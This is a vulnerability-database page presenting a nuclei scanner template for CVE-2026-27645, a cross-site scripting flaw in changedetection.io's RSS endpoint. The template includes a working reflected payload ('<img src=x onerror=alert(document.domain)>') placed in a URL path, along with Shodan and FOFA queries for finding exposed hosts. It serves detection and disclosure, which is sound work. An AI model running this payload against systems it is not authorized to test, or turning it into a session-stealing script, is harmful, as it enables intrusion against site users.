Lucene search
K

Changedetection.io RSS Single Watch - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Changedetection.io RSS Single Watch stored XSS via UUID path in RSS endpoint; victim must visit URL.

Related
Refs
Code
id: CVE-2026-27645

info:
  name: Changedetection.io RSS Single Watch - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    changedetection.io < 0.54.1 contains a stored XSS caused by unescaped reflection of UUID path parameter in RSS single-watch endpoint, letting remote attackers execute JavaScript in victim's browser, exploit requires victim to visit crafted URL.
  impact: |
    Attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks
  remediation: |
    Update to version 0.54.1 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-mw8m-398g-h89w
    - https://github.com/dgtlmoon/changedetection.io/commit/a385c89abf44b52fcfa20c7c6a6dd3047c4c1eb5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27645
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-27645
    cwe-id: CWE-79
    epss-score: 0.00445
    epss-percentile: 0.35714
  metadata:
    max-request: 2
    verified: true
    fofa-query: title="Change Detection"
    shodan-query: http.title:"Change Detection"
  tags: cve,cve2026,xss,changedetection,rss

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "rss?token=", "Change Detection")'
        internal: true

    extractors:
      - type: regex
        name: rss_token
        part: body
        group: 1
        regex:
          - 'rss\?token=([a-f0-9]{16,64})'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "Watch with UUID")'
        condition: and
# digest: 4a0a0047304502200486cc763ba8fb628a0da7dd187334ca160ae7f96c11938ccfed80091810d32a022100b354bd4f128d7c40a6c03a6eaf88a9a3636172039b57048a47e4986d8876e5c6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Feb 2026 07:51Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.00445
SSVC
28